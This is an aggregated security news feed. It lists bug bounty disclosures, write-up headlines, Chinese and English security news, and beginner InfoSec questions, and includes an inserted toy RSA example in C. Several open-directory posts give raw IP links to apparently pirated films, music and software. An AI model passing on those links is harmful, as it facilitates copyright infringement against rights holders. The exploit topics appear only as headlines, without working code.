    submitted by /u/sullivanmatt [link] [comments]  ( 5 min )
  • Open

    Subdomain takeover of images.crossinstall.com
    Twitter disclosed a bug submitted by ian: https://hackerone.com/reports/1406335
    ABLE TO TRICK THE VICTIM INTO USING A CRAFTED EMAIL ADDRESS FOR A PARTICULAR SESSION AND THEN LATER TAKE BACK THE ACCOUNT
    Mattermost disclosed a bug submitted by at11zt00: https://hackerone.com/reports/1357013 - Bounty: $150
    Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
    8x8 disclosed a bug submitted by n1had: https://hackerone.com/reports/1440161
  • Open

    Using Recon-Ng for Recon for Bug Bounty
    Recon-Ng is a great tool for automating your recon workflow and is one of the must have tools for Bug bounties Continue reading on Medium »  ( 1 min )
    How I was able to spoof any Instagram username on Instagram shop
    Summary: I discovered that I can spoof any Instagram username on Instagram shop, with this bug scammers can trick people into thinking… Continue reading on Medium »  ( 1 min )
    Why we use Nmap?
    I clear this topic in 2 points 1. As hacking or penetration testing. 2. Use in bug bounty. 1. As a Hacker- We know that nmap is network… Continue reading on Medium »  ( 1 min )
    Implementing Django-rest API Throttling and Unauthenticated bypass
    In the name of God. Continue reading on InfoSec Write-ups »  ( 4 min )
    Facebook android webview vulnerability : Execute arbitrary javascript (xss) and load arbitrary…
    For detailed information read the blog below: Continue reading on InfoSec Write-ups »
  • Open

    We’re Organizing Our First Virtual Conference cum Networking Event
    And we want you to be a part!  ( 2 min )
    Day3, Computer Networks — 100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    Implementing Django-rest API Throttling and Unauthenticated bypass
    In the name of God.  ( 4 min )
    Day2, Navigating Linux — 100DaysofHacking
    Day1 : Installing Kali Linux  ( 5 min )
  • Open

    My new discoveries....
    http://www4.co.black-hawk.ia.us/engineer/ - Road Establishment Records, County Aerials, Road Establishment Records https://www.ndbc.noaa.gov/data/ - So much data! http://167.114.174.132:9092/ - Movies, Series, Music, etc http://162.12.215.254/ - Movies, Android Apps and Games, Software, Tv Series submitted by /u/ManaHoney504 [link] [comments]  ( 1 min )
    Archive.org (9th Time, Jim!)
    Is not an open directory. C’mon, mods, help us out here? edit/ apparently archive.org is technically an open directory. Thanks mod for addressing this and making the community an even better place for us pirates. Rrrrrrrr, matey. edit2/ PEACE AND LOVE, this is not a post directed to anyone in specific. PEACE AND LOVE. submitted by /u/martusfine [link] [comments]  ( 2 min )
    lots of books
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    Is there a better alternative for Mega and Google Drive?
    Please recommend a file sharing service that is better than the two aforementioned. I am uploading books and PDFs concerning translations and machine learning. Something quite unknown to most and not too much hassle. Not too keen on bans and removals submitted by /u/Burlack [link] [comments]  ( 2 min )
  • Open

    Fuzzing and exploiting map parser in Teeworlds
    submitted by /u/mmmds [link] [comments]
  • Open

    Beyond the Borrow Checker: Differential Fuzzing
    Article URL: https://tiemoko.com/blog/diff-fuzz/ Comments URL: https://news.ycombinator.com/item?id=29811302 Points: 2 # Comments: 0  ( 14 min )
  • Open

    SecWiki News 2022-01-05 Review
    Focusing on the chaos of algorithmic recommendation: building an algorithm security governance system by ourren; Where do good research ideas come from by ourren; Open source intelligence and its application in next-generation cybersecurity: a literature review by ourren; Product knowledge graph construction and entity alignment by ourren; What crimes might web crawler companies commit by ourren; For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    KNOW YOUR PUBLIC PRESENCE ONLINE
    Day in and day out people sign up for services and fast forward lose track of these services because they don’t use them. It will be… Continue reading on Medium »  ( 2 min )
    The OSINT-ification of ISIS on the Dark Web
    *Note: This article was originally published by the author on March 11, 2019. Continue reading on Medium »  ( 11 min )
  • Open

    A brief analysis of using processes to implement file control
    In the article “On Process Creation Analysis”, some Linux commands, process creation and process states were explained, along with a few small labs. This article continues from the previous one, explaining some file operation commands and doing a few small labs.  ( 1 min )
    The Cyberspace Administration of China plans to revise the Provisions on the Administration of Mobile Internet Application Information Services
    On January 5, 2022, the Cyberspace Administration of China revised the Provisions on the Administration of Mobile Internet Application Information Services, which took effect on August 1, 2016.
    FreeBuf Morning Report | DatPiff data breach affects millions; raise anti-fraud awareness and don't let screen-sharing scams succeed
    The Cyberspace Administration of China has drafted revisions to the Provisions on the Administration of Mobile Internet Application Information Services currently in force and is now soliciting public comments.  ( 1 min )
    Purple Fox malware spreads disguised as a Telegram installer
    Unlike the distribution methods of other malware, the new distribution method adopted by Purple Fox makes it even stealthier.  ( 1 min )
    A review of the serious cyberattacks of 2021
    A roundup of cyberattacks suffered by some entities around the world in 2021.  ( 1 min )
    While you watch videos, hackers are stealing your credit card information
    In this supply chain attack, the Unit42 security team found more than 100 real estate websites affected by the campaign, which means the attack was very successful.  ( 1 min )
    US wireless carrier UScellular discloses a data breach that occurred at the end of the year
    UScellular, one of the largest wireless carriers in the US, disclosed a data breach that occurred last December.
  • Open

    FTC warns companies to remediate Log4j security vulnerability
    Article URL: https://www.ftc.gov/news-events/blogs/techftc/2022/01/ftc-warns-companies-remediate-log4j-security-vulnerability Comments URL: https://news.ycombinator.com/item?id=29806997 Points: 2 # Comments: 1  ( 5 min )

  • Open

    How to change my public ip manually
    I already checked that my ip is dynamic but it seems to change every long time, does anyone know how to make it change manually? I have already spent about 1 month and tried restarting the router but it did not work submitted by /u/Shark233F [link] [comments]  ( 1 min )
    Was I DDOS attacked?
    I was browsing the PHP files on a website and kept getting remote force disconnected, and after reconnecting a few times suddenly nothing would load, not even other sites like Google. Switching over to a different network and going back to the site, it worked fine. Can't confirm but it also looked like the load on the entire previous network went up. The acronyms start to run together with trying to differentiate DOS, DDOS, and DNS, DNS Flood, Ipv4, IPv6, and DDNS, so I'm wondering if this was a DDOS attack on my specific DNS. Did they try to flood the IP with traffic to stop connectivity to the internet, or was something else going on? The website was public and anyone could see the stuff, but they must have been monitoring the traffic somehow and decided to disconnect what I was looking at, but after changing over networks everything was still up in the exact same place. The network I was on was probably bigger than theirs, being some random site, and it didn't look like they brought down the whole network, so it's strange that even other sites wouldn't load. I ran a WHOIS on the site and it turned out to be some Namecheap domain running on a Cloudflare server registered under a fake address, and it's only been up for about 14 months. submitted by /u/NoFilterr [link] [comments]  ( 1 min )
    State-of-the-art models or techniques applies to InfoSec?
    Hello, I'd like to know about some good and innovative practices that you can't find in standard guidelines like the ISO 27001 for example. The thing is, my company is stuck in the early 2000s with a Zero Trust policy for everything (which can be bypassed easily) and this is just a pain in the ass, not efficient at all, considering it just makes workers 100% dependent on IT for any requirement. So I want to ask for your advice submitted by /u/Key-Clothes-152 [link] [comments]  ( 1 min )
    Zscaler's Cloud Workload Communications protection
    Happy new Year everyone, Wonder if anyone had any experience with this so far? https://www.zscaler.com/press/zscaler-extends-its-proven-zero-trust-exchange-platform-deliver-zero-trust-workloads submitted by /u/killb0p [link] [comments]
    We all love MFA - is it a good idea to keep Google Authenticator addon in Chrome / Web Browser?
    I'm always thinking twice before installing any addon in my web browser. Very often removed it after I used it. However, there are addons designed to stay for longer. Like, google authenticator addon and alike. Q: For sake of security, is it a good idea to keep Google Authenticator addon in chrome or just forget about it and stick to the smartphone / pass-manager? submitted by /u/bitsailor [link] [comments]  ( 2 min )
    Proxy scanning(xpost r/hacking)
    So I just started looking into 0.0.0.0/0 scanning and it has shown a lot of potential so far with applications like zmap and zgrab, had a lot of fun joining random minecraft servers, but I would like to explore a more practical, useful you might say, approach. When I think of scanning the internet other than vulnerable DNS servers, I think about those looooong ass free proxy lists sitting there in the open. I know, I know those are not anonymous, but I was wondering, how the duck do they get those lists, they are obviously not their servers, and to add to that proxies often have random ports, how do you scan for a service that has random ports, even then if you find a server with a port 80 or 8080 it could just be an http server out there, how do you identify it is an actual proxy, banner perhaps? ps: pls do not point out proprietary software or any if you can, I'm trying to learn here (TL;DR) I want a proxy list, made by me, and I'm struggling, pls help submitted by /u/filippobob [link] [comments]  ( 1 min )
    Suricata: anomaly-based detection?
    I tried Googling this, but am getting mixed messaging. It's signature based, but can detect anomalies? submitted by /u/albertcuy [link] [comments]  ( 1 min )
    tcpdump: how to keep packets that contain a substring only
    I have the following tcpdump command: sudo tcpdump -i eth0 -nn -A -s 65535 -w somepackets2.cap "(port not 443) && (less 15) && (tcp) && (greater 30)", but I want to add on another "and" condition that keeps only packets that contain "mysubstring". How can I do that? submitted by /u/social-bleach [link] [comments]  ( 1 min )
    Phishing email sent from own mail? Email spoofed or hacked?
    So, I received one of those threat emails where they say my device is compromised, and the sender is myself. Phone is fine, no signs of viruses, I'm careful as well, have Adblock, have HTTPS everywhere. Google lists no suspicious activity, no traces that my mail was hacked. I changed passwords anyway, but can't help but be paranoid. I know it's possible to spoof an email address, and Google itself says the sender may not be the address shown. I was trying to see the original header with the help of a howtogeek guide, but there's no email address other than my own. Mail says it's a zero click vulnerability, that I was hacked through a website, but it all seems very unlikely. Can anyone please elaborate on this? My mail was not hacked? I'm not on have I been pwned, which is why I was extra concerned: how the heck do they have my email? submitted by /u/Unluckyclover_ [link] [comments]  ( 1 min )
    Do integer overflows also buffer overflow?
    Hi, I'm currently learning about C and the classic vulnerabilities that arise. Right now buffer overflows. So, just to sum up my understanding, an example like this will overflow because 'ab' is two bytes and is too big to store in the last byte of "buff": char buff[10]; buff[9] = 'ab'; The wiki article about buffer overflows defines them as follows: "while writing data) to a buffer, overruns the buffer's boundary" This got me thinking that this sounds a lot like integer overflows. Trying to put something into a container that it cannot contain. But let's take the following example of an integer overflow (I use unsigned char for having the most simple case): unsigned char c = 255; unsigned char cc = c + 1; Ok, so the single byte of the char cannot contain a value higher than 255, and thus it does modulo. And my understanding of integer overflow is that internally, the computer tries to put a 1 to the left of the current number, such that if 255 looks like this: 11111111 then it simply assumes that there exists a place that represents 256, and tries to create this binary number: 100000000 But there is no such bit, and therefore the number just becomes 00000000. But the single 1 that is lost, doesn't that go somewhere in memory? For that reason, my thought was that integer overflows had to also contain buffer overflows. Is this true? Further thoughts At the core of the issue is a question of what actually constitutes a buffer in C. You could maybe argue that this problem would have been better suited for r/learnprogramming. But yeah, my guess is that it depends on whether or not a certain variable counts as a buffer. Is an int a buffer? Is a char[]? etc? submitted by /u/GarseBo [link] [comments]  ( 2 min )
    What position would be most qualified for hacking?
    From reading this I'm thinking Security Analyst would be closest https://www.cs.seas.gwu.edu/cybersecurity-roles-and-job-titles submitted by /u/cookred [link] [comments]
  • Open

    The Story Of How I Bypass MAC Filter
    Hello everyone, Continue reading on Medium »  ( 2 min )
    Day3, Computer Networks — 100DaysofHacking
    Day1 : Installing Kali Linux Continue reading on InfoSec Write-ups »  ( 3 min )
    Accessing GoDaddy internal instance through an email logic bug.
    Hey All, Continue reading on System Weakness »  ( 3 min )
    Accessing GoDaddy internal instance through an email logic bug.
    Hey All, Continue reading on Medium »  ( 2 min )
    How to freely borrow all the TVL from the Jet Protocol
    Recently I discovered a critical vulnerability that could possibly lead to the loss of funds in the smart contract of Jet Protocol, a… Continue reading on Medium »  ( 3 min )
    OAuth Misconfiguration Leads to Account Takeover
    Assalamu alaikum wr. wb. Hello friends, I want to explain the bug bounty that I got in 2020; this vulnerability lies in the weak OAuth Continue reading on Medium »  ( 1 min )
    SQL Injection - The File Upload Playground
    Summary : Continue reading on Medium »  ( 3 min )
    Spotlight: Earn Bitcoin While Browsing The Web On Desktop And Mobile
    Is it too good to be true? Well, join me on my quest to find out. Continue reading on Medium »
  • Open

    British Tv-Episodes of The Avengers, Bergerac, TOTP, The Professionals, Coronation Street, Dr Who. (1 seri Doomwatch, Dr Who (inferno)
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Dr who literature
    submitted by /u/International_Milk_1 [link] [comments]
    Channel for old british tv stuff, mostly it would seem for kids. eg Paddinngton bear, but also dads army, one foot in the grave, etc etc.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    I have hundreds of *credible* books on corruption, parapolitics, economic warfare, propaganda, and state crimes. I’d like to share them but they are on an iCloud folder and too large to download. Is there anyway to transfer directly to Mega, please?
    submitted by /u/Few_Tumbleweed7151 [link] [comments]  ( 2 min )
    Smallish list of mostly Japanese movie and tv stuff. Some raw, some with english subs, some english dubs.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    FTP: Misc IBM software, marketing & training materials, annual reports, etc from 1994 to present
    submitted by /u/xuvatilavv [link] [comments]
    BSG Battlestar Galactica 720p Complete 2003-2012 Extras Subs
    http://37.187.18.191/tv/BSG%20Battlestar%20Galactica%20720p%20Complete%202003-2012%20Extras%20Subs/ submitted by /u/SeniorAlbatross [link] [comments]
    Anime Fansubs
    submitted by /u/International_Milk_1 [link] [comments]
    David Bowie Bootlegs
    submitted by /u/International_Milk_1 [link] [comments]
  • Open

    OPEN REDIRECT
    Nutanix disclosed a bug submitted by kauenavarro: https://hackerone.com/reports/1369806
    Buffer overflow in req_parsebody method in lua_request.c
    Internet Bug Bounty disclosed a bug submitted by chamal: https://hackerone.com/reports/1434056 - Bounty: $2000
    %0A (New line) and limitness URL leads to DoS at all system [Main adress (https://www.acronis.com/)]
    Acronis disclosed a bug submitted by plantos: https://hackerone.com/reports/1382448
  • Open

    Sears Garage Door Signal Reverse Engineering
    submitted by /u/mdulin2 [link] [comments]  ( 1 min )
    Domain Persistence - AdminSDHolder
    submitted by /u/netbiosX [link] [comments]
    Cache Poisoning at Scale
    submitted by /u/albinowax [link] [comments]
  • Open

    SecWiki News 2022-01-04 Review
    CodeAnalysis: Tencent Static Code Analysis by ourren; Network Security Standard Practice Guide: Guidelines for Classifying and Grading Network Data by ourren; Backend architecture design that withstood 10 billion red-envelope requests by ourren. For more recent articles, visit SecWiki  ( 2 min )
  • Open

    Top books to learn Android Hacking & Security
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    Quick read: 17 key points of the Cybersecurity Review Measures
    The Cybersecurity Review Measures have been released; get up to speed on these key points as soon as possible.  ( 1 min )
    FreeBuf Morning Briefing | Portugal's largest media group hit by ransomware; Israeli media attacked on the anniversary of Soleimani's killing
    Global news 1. Israeli media hacked on the anniversary of Soleimani's killing: on the anniversary of the killing of IRGC commander Soleimani, threat actors compromised the English-language website of The Jerusalem Post and the Twitter account of Maariv. [Foreign press: read the original] 2. Greek hackers "take over" NASA director's social media account: the personal Twitter account of NASA director Parimal Kopardekar was hijacked by Greek hackers. A spokesperson for the hacker group said that this  ( 1 min )
    Interview with Yunshu of Moresec (默安科技): weaving security into development, quietly, like spring rain
    Yunshu, co-founder and CTO of Moresec (默安科技), has over 16 years of security experience, is a well-known industry voice, and is a leading evangelist of the deception-defense concept.  ( 1 min )
    The five security topics most worth following in 2021: the ones you care about all made the list
    This may indicate that, once the new ways of working have become the "norm", the outside world is more keen to follow innovation in cybercrime.  ( 1 min )
    The past and present of security situational awareness
    The emergence of security situational awareness is an inevitable result of the development of national security strategy.  ( 1 min )
    A study of DNS rebinding attacks
    With every click on a suspicious link, a DNS rebinding attack can do more than exploit an application with a DNS rebinding vulnerability; it may even let an attacker instantly take control of other connected devices on your home network.  ( 1 min )
    Broward Health discloses a data breach affecting more than 1.3 million people
    Notably, the point of intrusion was identified as a third-party medical provider that delivers services by connecting to the healthcare system and therefore held a degree of access.  ( 1 min )
    On the first day of 2022, Microsoft Exchange could not send email
    A new year brings a fresh start, but on the first day of 2022 Microsoft played a not-so-small "joke" on everyone.  ( 1 min )
    Greek hackers "take over" NASA director's social media account
    The Twitter account of NASA director Parimal Kopardekar was hijacked by Greek hackers.  ( 1 min )
    Incident response: analysing outbound connection requests
    Handling and analysis of a malicious DNS resolution request incident  ( 1 min )
    A roundup of prevalent ransomware in 2021
    In 2021, manufacturing, services, construction, finance, energy, healthcare, industrial control and government organisations worldwide were repeatedly hit by ransomware, causing severe losses to global industrial output.  ( 1 min )
    Apple iOS "doorLock" vulnerability can "brick" phones
    A new persistent denial-of-service vulnerability named "doorLock" has been found in Apple HomeKit, affecting iOS 14.7 through iOS 15.2.  ( 1 min )
    The Cyberspace Administration of China and three other departments issue the Provisions on the Administration of Algorithmic Recommendation in Internet Information Services
    The Provisions define "applying algorithmic recommendation technology" as using algorithmic techniques such as generation and synthesis, personalised push, ranking and selection, retrieval and filtering, and scheduling and decision-making to provide information to users.
    Thirteen departments revise and issue the Cybersecurity Review Measures, effective 15 February 2022
    The Measures make clear that operators of online platforms holding the personal information of more than one million users must apply to the Cybersecurity Review Office for a cybersecurity review before listing abroad.
    The big 2021 ransomware roundup
    Why does ransomware have such power that every industry turns pale at its mention? Faced with ransomware, is "lying flat" really the only option?  ( 1 min )
    A summary of broken access control attacks from real-world engagements
    This post summarises the broken access control (越权) attacks encountered in this year's penetration tests, so we can all learn together; if anything is lacking or you have suggestions, please raise them.  ( 1 min )
  • Open

    Domain Persistence – AdminSDHolder
    Utilizing existing Microsoft features for offensive operations is very common during red team assessments as it provides the opportunity to blend in with the environment… Continue reading → Domain Persistence – AdminSDHolder  ( 3 min )
  • Open

    Solving OSINT Dojo’s 2022’s first quiz
    Today I am solving first 2022 quiz post by #OSINTDojo Continue reading on Medium »  ( 2 min )
    Claim: China operated black jail in Dubai — Open Source Analysis
    In August 2021 Associated Press (AP) reported a claim that a Chinese woman was held at a “Chinese-run secret detention facility ” in Dubai Continue reading on Medium »  ( 4 min )
  • Open

    December 2021 update for Netsparker Standard 6.3
    We’re delighted to announce the December 2021 update for Netsparker Standard 6.3. The highlights of this release are software composition analysis (SCA), the OWASP Top Ten 2021 Report, and support for scanning GraphQL APIs. READ MORE  ( 2 min )
  • Open

    Simple DLL that creates and adds a user to the local Administrators group
    A simple C++ DLL that creates and adds a user to the local #Administrators group. Useful when dealing with privilege escalation on Windows to gain local administrator access when you do not care about opsec. Repo: https://github.com/notdodo/adduser-dll submitted by /u/d_o_d_o_ [link] [comments]  ( 1 min )
  • Open

    doorLock: HomeKit DoS/semi-bricking Vulnerability (Via Home Invitation)
    Article URL: https://twitter.com/trevorspiniolas/status/1477185285784051712 Comments URL: https://news.ycombinator.com/item?id=29793176 Points: 2 # Comments: 1  ( 1 min )
  • Open

    Previse from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 5 min )
    TryHackme — Cross-Site Scripting
    Malicious Script Injection  ( 3 min )
    Proof of concept: zero-day- log4j RCE
    What is log4j?  ( 3 min )
    OWASP-Access Control Vulnerability
    This article is going to focus on Access control security and Broken Access control, it will summarize the thoughts, procedures and…  ( 6 min )
  • Open

    ASK: What should I look for in a master's program before opting for it?
    Hey everyone, I have been thinking of pursuing a master's in cybersecurity. I love tinkering with low-level stuff, especially embedded systems and exploit development. But I don't know if the universities offer courses targeting them. Can the community suggest some good unis that I can apply to based on my inclination? PS: Can someone also take a look at my SOP? I don't have anyone who can proofread my SOP. submitted by /u/sidhu97ss [link] [comments]  ( 1 min )
  • Open

    Basic Overview: Active Directory Hacking
    Introduction Continue reading on Medium »  ( 3 min )
    TryHackMe — Advent of Cyber 3 (2021) WriteUp
    WriteUp for all Challenges in THM Advent of Cyber 3 Continue reading on Medium »  ( 16 min )
  • Open

    Disney Channel Stuff+
    submitted by /u/International_Milk_1 [link] [comments]
    Dr Who (The original series) Seasons 1-8.
    submitted by /u/International_Milk_1 [link] [comments]
    Some old movies and Tv series
    submitted by /u/International_Milk_1 [link] [comments]
    Columbo episodes
    submitted by /u/International_Milk_1 [link] [comments]
    Mixture off BBC Radio stuff. Fact and Fiction.
    submitted by /u/International_Milk_1 [link] [comments]
    movies for the film buff
    submitted by /u/International_Milk_1 [link] [comments]
    archive.org link to Japanese movies, tv series with english subtitles filtered by title.
    submitted by /u/International_Milk_1 [link] [comments]
    large dex
    http://90.146.184.46/ submitted by /u/Dagad0s [link] [comments]
    Musikk (FLAC + MP3)
    https://85.166.158.78/RaidNAS/Lyd/Musikk/ [DIR] Atreyu/ 11-Oct-2019 23:56 - [DIR] Avenged.Sevenfold/ 08-Nov-2019 23:46 - [DIR] Bullet.For.My.Valentine/ 08-Nov-2019 23:52 - [DIR] Metallica/ 12-Oct-2019 00:06 - [DIR] Nirvana/ 12-Oct-2019 00:06 - [DIR] Papa.Roach/ 12-Oct-2019 00:08 - [DIR] Pink.Floyd/ 12-Oct-2019 00:13 - submitted by /u/Dagad0s [link] [comments]
    mostly Metallica / Nightwish (largely FLAC 24/96)
    https://seisho.us/swap/ submitted by /u/Dagad0s [link] [comments]  ( 1 min )
    Sheetmusic for (wind)band
    Nice collection of sheetmusic (scores and parts) for (wind)band https://camdencommunityband.org.au/wp-content/uploads/2019/07/ submitted by /u/notmcgvien [link] [comments]  ( 1 min )
    nice selection (FLAC \ MP3)
    http://51.198.90.160/resources/Music/ submitted by /u/Dagad0s [link] [comments]
    I made an OD browser with IMDB ratings built in
    Hey r/opendirectories! ​ I made a web app that helps me identify poorly rated movies in open directories so I can avoid them. This post isn't to promote my project or anything -- which is why I am not disclosing the name or sharing the link to the git repo -- I am writing to gather feedback and to see if people would be interested in using it when it becomes mature enough one day. ​ ​ https://i.redd.it/nblwcs660f981.gif ​ First off, why I made this tool and what the tool does: ​ I am a casual OD user who downloads just a couple movies at a time. It's not difficult to guess that I do a lot of Google searches to decide on what I want to download -- sometimes you can go through 20+ poorly reviewed movies before seeing something decent. I wanted something I can use to rule out bad mov…  ( 3 min )
    An MSX site that links to a bunch of directories.
    Just scroll down to enjoy this neat little rabbithole. https://www.file-hunter.com submitted by /u/EmuAnon34 [link] [comments]
    "New Wave Theatre" - Episodes 1 through 25: Internet Archive. Live music from the early 1980s on Night Flight
    submitted by /u/FireHole [link] [comments]
  • Open

    Log4Shell: RCE 0-day exploit on
    U.S. Dept Of Defense disclosed a bug submitted by mr_x_strange: https://hackerone.com/reports/1429014
  • Open

    What was 2021 like for your SOC?
    What was 2021 like for your SOC? Any workflow or tool changes that made an impact? Did your team handle more or less incidents? submitted by /u/wowneatlookatthat [link] [comments]
    Phone camera related question
    How do I find out whether my phone's camera is turned on or off? I don't have any sort of LED indicator next to my phone's camera. Is there any other way to see whether the camera is being used or not? If I'm using (for example) Snapchat to take a picture/video, then can other camera apps on my phone like TikTok/Kiradroid/WhatsApp camera also be turned on simultaneously? Is it possible for other camera apps to see what I'm recording on Snapchat? Note: in TikTok's permissions, "run foreground service" is mentioned. submitted by /u/hamza_37 [link] [comments]  ( 1 min )
    Is it safe to hide insecure servers in an intranet?
    Is it generally safe to hide insecure servers (like a REST API server without authentication, no JWT, no basic auth) in an intranet (or a Docker network without publishing the port)? What kind of risk will I be exposed to? Let's say I have servers A, B and C, and I will publish and expose server A to the public, and I only want servers B and C to be reached by server A. Is it safe to keep servers B and C in the intranet (server A will be in that intranet as well, but exposed to the public)? submitted by /u/hksparrowboy [link] [comments]  ( 2 min )
    Call listening symptoms, spy tech, dual SIM or cloning? How can one get proof of this that is admissible as evidence?
    I am being stalked by my ex; pretty sure she has screwed herself an army of tech-savvy individuals to help her. It's been almost 2 years; I just want to get proof or get her to leave me alone. So if someone was spoofing my phone and listening to my calls, is it a possibility that if they hung up before I was off the phone, I could get an incoming call from the person I was currently talking to, and their phone would suddenly start ringing like they called me again? This phenomenon has happened 3-5 times to me before I realized; it has only happened since my ex moved out. She somehow had my phone cloned and was following me all over the internet, as she could see where I was posting. I don't think she could modify things on the phone like screenshots, but someone else handles package delivery. I got a new Samsung phone and within three days I had four apps that had been sideloaded on there, one of them the Verizon app that allows you to supposedly hack a phone; I of course deleted them. I watched the Google Family app appear miraculously on my phone screen at a concert while trying to discern if that was my ex standing approximately 40 yards away, who should've been home with our daughter. I moved in to see if it was her and she hid behind her hair while walking 20 yards ahead and exited the concert. Pretty sure she has contacted clients and women I was talking to and told them outlandish lies to create problems; she follows me all over the internet, posting where I post, creating accounts where I have accounts, all in the name of narc psychopath BS. It was bad enough, all the cheating that came to light and the mental abuse when we lived together; now this shit. Any help would be great, thanks. submitted by /u/itwasEMOTIONALmurder [link] [comments]  ( 4 min )
    ELI5: Why can a message not be decrypted with the public key in PKI?
    Apologies if this is the incorrect sub for this, but this is the only one I found that I thought would fit. I'm studying for Sec+, and currently trying to understand PKI and asymmetric encryption protocols. Say, for example, I encrypt a message using Google's public key to send to Google.com, and a MITM intercepts it. Why can't the MITM decrypt the message using the public key, when it was encrypted using the public key in the first place? Why does it have to be decrypted using the private key? Thank you for the help! submitted by /u/bookandrelease [link] [comments]  ( 3 min )
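    An added worked example for the question above (editor's illustration, not code from the original post). In textbook RSA the public key is (n, e) and the private key is d, chosen so that e·d ≡ 1 (mod φ(n)). Encryption raises the message to the power e; only raising the result to the power d brings the overall exponent back to 1 modulo φ(n), which is what recovers m. Applying e a second time yields m^(e·e), just another unrelated residue, so an interceptor holding only the public key gets garbage. Deriving d from (n, e) needs φ(n) = (p−1)(q−1), i.e. the factorisation of n, which is trivial for the 12-bit toy modulus used here and infeasible for a real 2048-bit one. The primes 61 and 53 and exponent 17 are the classic textbook parameters and are not secure; the trial-division routine is an assumption added for the illustration.

```c
#include <stdint.h>
#include <stdio.h>

/* Added example: textbook (unpadded) RSA with toy parameters, to show why
 * the public exponent cannot undo itself. NOT secure; illustration only. */

/* Square-and-multiply modular exponentiation. Inputs stay below 2^32 so
 * the 64-bit products never overflow. */
static uint64_t modpow(uint64_t base, uint64_t exp, uint64_t mod) {
    uint64_t result = 1;
    base %= mod;
    while (exp > 0) {
        if (exp & 1) result = (result * base) % mod;
        base = (base * base) % mod;
        exp >>= 1;
    }
    return result;
}

/* Modular inverse of a modulo m by the extended Euclidean algorithm.
 * Requires gcd(a, m) == 1, which key generation guarantees by choice of e. */
static uint64_t modinv(int64_t a, int64_t m) {
    int64_t m0 = m, x0 = 0, x1 = 1;
    while (a > 1) {
        int64_t q = a / m;
        int64_t t = m;  m = a % m;  a = t;
        t = x0;  x0 = x1 - q * x0;  x1 = t;
    }
    if (x1 < 0) x1 += m0;
    return (uint64_t)x1;
}

typedef struct { uint64_t n, e, d; } rsa_key;

/* Key generation from two primes: n = p*q is public, phi = (p-1)(q-1) is
 * the secret that lets us derive d from e. Whoever knows only n must
 * factor it to get phi. */
static rsa_key rsa_keygen(uint64_t p, uint64_t q, uint64_t e) {
    rsa_key k;
    k.n = p * q;
    k.e = e;
    k.d = modinv((int64_t)e, (int64_t)((p - 1) * (q - 1)));
    return k;
}

/* The public operation (encrypt / verify) and the private one (decrypt / sign). */
static uint64_t rsa_public(const rsa_key *k, uint64_t x)  { return modpow(x, k->e, k->n); }
static uint64_t rsa_private(const rsa_key *k, uint64_t x) { return modpow(x, k->d, k->n); }

/* Trial division: feasible for the toy modulus, hopeless for a real one.
 * This is the step the private key's secrecy rests on. */
static uint64_t smallest_factor(uint64_t n) {
    for (uint64_t f = 2; f * f <= n; f++)
        if (n % f == 0) return f;
    return n;
}

/* Recover d from (n, e) alone by factoring n: works here only because n is tiny. */
static uint64_t recover_private_exponent(uint64_t n, uint64_t e) {
    uint64_t p = smallest_factor(n), q = n / p;
    return modinv((int64_t)e, (int64_t)((p - 1) * (q - 1)));
}

/* Convenience wrappers around the classic toy key (p=61, q=53, e=17). */
static uint64_t toy_encrypt(uint64_t m)      { rsa_key k = rsa_keygen(61, 53, 17); return rsa_public(&k, m); }
static uint64_t toy_decrypt(uint64_t c)      { rsa_key k = rsa_keygen(61, 53, 17); return rsa_private(&k, c); }
/* What the interceptor can do with the public key alone: apply e again.
 * c^e = m^(e*e) mod n is not m, because e*e is not 1 mod phi(n). */
static uint64_t toy_public_again(uint64_t c) { rsa_key k = rsa_keygen(61, 53, 17); return rsa_public(&k, c); }

int main(void) {
    uint64_t c = toy_encrypt(65);
    printf("ciphertext                 : %llu\n", (unsigned long long)c);
    printf("decrypt with d             : %llu\n", (unsigned long long)toy_decrypt(c));
    printf("apply e again (MITM)       : %llu\n", (unsigned long long)toy_public_again(c));
    printf("d recovered by factoring n : %llu\n", (unsigned long long)recover_private_exponent(3233, 17));
    return 0;
}
```

    Decrypting with d returns 65; re-applying the public exponent to the ciphertext returns 1452, a residue that says nothing about the message. The only way to obtain d without being handed it is `recover_private_exponent`, which works in microseconds for n = 3233 and is exactly what nobody can do for a 617-digit modulus.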
  • Open

    A New Web Skimmer Campaign Targets Real Estate Websites Through Attacking Cloud Video Distribution Supply Chain
    A supply chain attack leveraging a cloud video platform to distribute web skimmer campaigns compromised more than 100 real estate sites. The post A New Web Skimmer Campaign Targets Real Estate Websites Through Attacking Cloud Video Distribution Supply Chain appeared first on Unit42.
  • Open

    Module 1 | Introduction: Pentesting & Bypassing the Cloud Web Application Firewalls of Major Clouds
    Why should you not trust the cloud WAF? Continue reading on Medium »  ( 3 min )
    100%OFF | Pentesters Practical Approach for Bug Hunting and Bug Bounty
    Welcome to this course on Pentesters Practical Approach for Bug Hunting and Bug Bounty. To enjoy this course, you need a positive attitude Continue reading on Medium »  ( 1 min )
    Bug Report Update
    As our testnet and bugbounty continues to thrive, we are very grateful for the active participation of our community to fix any and every… Continue reading on Medium »  ( 1 min )
    Story of YouTube’s Unfixable Ads Bypass
    Hello there! I hope everything is going well with you; today I will talk about my YouTube Ads bypass. Continue reading on Medium »  ( 3 min )
    P5 to P1: Interesting Account Takeover
    Hello Guys, Continue reading on Medium »  ( 2 min )
    IDOR leads to leak of Private Details
    I wish you, readers, a Merry Christmas and a Happy New Year. May this year bring us nothing more than love, joy, happiness, P1, P2… Continue reading on InfoSec Write-ups »  ( 2 min )
  • Open

    Best free utility to take an image of an iOS device?
    Hi there, I’m learning how to use Autopsy, and it has an iOS ingest module (iLEAPP). iLEAPP will accept a compressed .tar/.zip file or an iTunes backup. What’s the best way to capture an image of an iOS device? Would an iTunes backup encompass almost everything (excluding Health data, etc.), or is there a better utility? Thanks! submitted by /u/hamsterbilly [link] [comments]  ( 1 min )
  • Open

